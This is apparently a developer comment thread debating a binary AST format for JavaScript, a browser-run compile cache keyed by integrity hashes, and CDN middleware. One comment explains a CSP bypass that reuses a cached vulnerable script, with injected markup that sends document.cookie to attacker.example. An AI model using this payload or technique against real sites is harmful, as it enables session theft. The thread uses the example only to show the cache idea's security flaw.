
One of my main concerns with this proposal is the increasing complexity of what was once a very accessible web platform. There is an ever-increasing amount of tooling knowledge you need to develop, and something like this would certainly add to it, since "fast JS" would now require you to know what a compiler is. Sure, a good counterpoint is that this may be incremental knowledge you can pick up, but I still think a no-work, make-everything-faster solution would be better.

I believe there exists such a no-work alternative to the first-run problem, which I attempted to explain on Twitter, but it's not really the greatest platform for that, so I'll try again here. Basically, given a script tag:

    <script src="abc.com/script.js" integrity="sha256-123"></script>
A browser, such as Chrome, would kick off two requests: one to abc.com/script.js, and another to cdn.chrome.com/sha256-123/abc.com/script.js. The second request is for a pre-compiled and cached version of the script (the binary AST). If it doesn't exist yet, the CDN itself downloads the script, compiles it, and caches it. For everyone except the first person to ever load this script, the second request returns before the first one finishes and parses. In other words, the FIRST person to ever see this script online takes the hit for everyone, since they alert the "compile server" to its existence; afterwards it's cached forever and fast for every other visitor on the web (that uses Chrome). A rough sketch of this flow is at the end of this comment.

(I have since expanded on this with some interesting security additions as well -- there's a way to do this such that the browser does the first compile and saves an encrypted version on the Chrome CDN, so that Google never sees the initial script and only people with access to the initial script can decrypt it.)

To clarify, this solution addresses the exact same concerns as the binary AST proposal. The pros to this approach, in my opinion, are:

1. No extra work on the side of the developer. All the benefits described in the above article are just free without any new tooling.

2. It might actually be FASTER than the above example, since cdn.chrome.com may be way faster than wherever the user is hosting their binary AST.

3. The CDN can initially use the same sort of binary AST as the "compile result", but this gives the browser flexibility to do a full compile to JIT code instead, allowing different browsers to experiment with caching different levels of compilation globally.

4. This would be an excellent way to gather lots of data before deciding to create another public-facing technology people have to learn - real-world JS performance has proven hard to predict.

5. It's much less complex to do things like dynamically assembling scripts (e.g. for dynamically loaded SPA pages), since the developer doesn't also have to put a binary AST compiler in their pipeline: you get binary-ification for free.

The main con is that it makes browser development even harder to break into, since if this is done right it would be a large competitive advantage and essentially requires a browser vendor to also host a CDN. I don't think this is that big a deal given how hard it already is to get a new browser out there, and in my opinion the advantage of getting browsers to compete on compile targets makes up for it.
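
To make the dual-request flow concrete, here's a rough sketch of the browser-side logic. This is not a real browser API; the cache URL layout just follows the cdn.chrome.com/sha256-.../host/path pattern above, and the racing logic is purely illustrative:

    // Sketch only -- not a real browser API. Race the origin fetch against a
    // shared compile cache keyed by integrity hash + original URL.
    async function loadScript(src, integrity) {
      const { host, pathname } = new URL(src, location.href);
      const cacheUrl = `https://cdn.chrome.com/${integrity}/${host}${pathname}`;

      // Raw source from the origin: must still be parsed/compiled locally.
      const fromOrigin = fetch(src).then(r => r.arrayBuffer());

      // Pre-compiled artifact from the shared cache: skips parsing entirely.
      // A miss (first visitor ever) just loses the race; the cache service then
      // fetches and compiles the script so everyone afterwards gets a hit.
      const fromCache = fetch(cacheUrl).then(r => {
        if (!r.ok) throw new Error('not cached yet');
        return r.arrayBuffer();
      });

      // Whichever usable result arrives first wins.
      return Promise.any([fromCache, fromOrigin]);
    }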




I don't think the binary AST proposal changes the accessibility status quo. In my mind, the best analogy is to gzip, Brotli, etc.

If you had to have a complicated toolchain to produce gzipped output to get the performance boost, that would create a performance gap between beginners and more experienced developers.

But today, almost every CDN worth its salt will automatically gzip your content because it's a stateless, static transformation that can be done on-demand and is easily cached. I don't see how going from JavaScript -> binary AST is any different.


I actually think gzip serves as a good example of this issue: this comment alone is daunting to a beginner programmer, and it really shouldn't be. This Chrome/CDN thing could ALSO be auto-gzipping for you, so that a beginner throwing files on a random server wouldn't need to know whether it supports gzip or not. I think we really take for granted the amount of stuff completely unrelated to programming we've now had to learn. If our goal is to make the web fast by default, I think we should aim for solutions that work by default.

It's definitely the case that once a technology (such as gzip) gets popular enough, it can reach "by default"-feeling status: express can auto-gzip, and you can imagine express auto-binary-AST-ing (a rough sketch of what that middleware might look like is below). It's slightly more complicated, because you still need a convention for where the binary AST lives if you want to avoid a dual script tag for older browsers that don't support the binary AST yet (or, I suppose, a header that specifies the browser supports binary AST results for JS files?). Similarly, at some point CDNs may also do this for you, but that assumes you know what a CDN is and can afford one. The goal I'm after is improvements that work by default on day 1, not after they've disseminated enough.

Additionally, I think it's really dangerous to create performance-targeted standards this high in the stack (gzip makes pretty much everything faster; the binary AST speeds up one kind of file and introduces a "third" script target for the browser). The Chrome/CDN solution means that a Firefox/CDN might try caching at a different level of compilation, so we'd get actual real-world comparisons for a year before settling on a standard (if one is necessary at all).
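
For illustration, here's a rough sketch of what "express auto-binary-AST-ing" could look like. The "Accept: application/javascript-binary-ast" header and the .binjs file convention are invented for this example; nothing like this is standardized:

    // Hypothetical middleware: serve a precompiled binary AST variant when the
    // client advertises support, otherwise fall back to the plain .js file.
    const express = require('express');
    const fs = require('fs');
    const path = require('path');

    const app = express();
    const DIST = path.join(__dirname, 'dist');

    app.use((req, res, next) => {
      if (!req.path.endsWith('.js')) return next();

      const wantsBinAst = (req.get('Accept') || '').includes('application/javascript-binary-ast');
      const binPath = path.join(DIST, req.path.replace(/\.js$/, '.binjs'));

      if (wantsBinAst && fs.existsSync(binPath)) {
        res.type('application/javascript-binary-ast');
        return res.sendFile(binPath);  // precompiled artifact
      }
      next();                          // plain JavaScript
    });

    app.use(express.static(DIST));
    app.listen(3000);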

Edit: another thing to take into account is that it now becomes very difficult to add new syntax features to JavaScript, since it's no longer just the browser that needs to support them, but also the version of the Binary AST compiler that your CDN is using.


The process of getting content onto the web has historically been pretty daunting, and is IMO much easier now than in the bad old days, when a .com domain cost $99/year and hosting files involved figuring out how to use an FTP client.

Services like Now from Zeit, Netlify, Surge, heck, even RunKit, make this stuff so much easier now. As long as the performance optimizations can happen automatically with tools like these, and are reasonable to set up yourself if you want to configure your own server, I think that's a net win.

I do agree with you though that we ought to fight tooth and nail to keep the web as approachable a platform for new developers as it was when we were new to it.

On balance, I'm more comfortable with services abstracting this stuff, since new developers are likely to use those services anyway. That's particularly true if the alternative is giving Google even more centralized power, and worse, access to more information that proxying all of those AST files would allow them to snoop on.


This suggestion has a problem similar to the reason that browsers don't globally cache scripts based on integrity values. Suppose a domain temporarily hosts a .js file with a CSP-bypass vulnerability (e.g. `eval(document.querySelector('.inline-javascript').textContent)` is a simple example; many popular JavaScript frameworks do the equivalent of this), and later removes it and starts using CSP. An attacker who knows an XSS vulnerability (which would otherwise be useless because of CSP) could inject a script tag with its integrity set to that of the CSP-vulnerable script that used to be hosted on the domain, and Chrome would find the script in the cdn.chrome.com cache.
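
To make that concrete, the injected markup might look something like this (the file name, hash placeholder, and payload are all invented for illustration):

    <!-- The origin no longer hosts /old-widget.js, but a global cache keyed
         by integrity would still return the old, vulnerable copy. -->
    <script src="/old-widget.js"
            integrity="sha256-HASH_OF_THE_OLD_VULNERABLE_FILE"></script>

    <!-- The resurrected script evals this element's contents, running the
         attacker's code even though CSP blocks inline scripts. -->
    <div class="inline-javascript">
      fetch('https://attacker.example/steal?c=' + document.cookie)
    </div>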

(You might be thinking someone could set CSP to disable eval on their pages, but eval is reasonably safe even in the presence of otherwise-CSP-protected XSS attacks as long as you aren't using code that goes out of its way to eval things from the DOM, and it's more than annoying that the only way to protect yourself from this cache issue would be to disable eval. ... Also, there are some libraries that interpret script commands from the DOM without using eval, so disabling eval doesn't even protect you if you previously hosted one of those javascript files.)

You could have the cdn.chrome.com cache aggressively drop entries older than a certain amount of time, say a day. But then there's the question of whether requests to the cache are just wasted bandwidth for the many scripts that haven't been loaded in a day. And the whole system means that website security can depend on cdn.chrome.com in some cases. I'd rather just build and host the processed binary AST myself. I already use a minifier; for most people, the binary AST tool would just replace their minifier.


Interesting idea, which could be built on top of the Binary AST.

I would personally prefer this to be handled transparently by the middleware or the CDN, which would neatly separate the responsibilities between the browser, the cache+compressor, and the HTTP server.

Anyway, one of the reasons this project is only about a file format is so that we can have exactly this kind of conversation about what browsers and other tools can do once we have a compressed JS file format.


One of my fears about doing this at the CDN level is that introducing a new syntax feature now means both the browser AND the version of the Binary AST compiler on your CDN need to support it. Imagine using a new JS keyword and all of a sudden all your code gets slower because it's a syntax error at the CDN level. I think it would slow the rate at which new syntax features are introduced, since it requires a lot more coordination: it's already a bit messy with different browsers having different support, and now caniuse.com might need to include CDNs too.



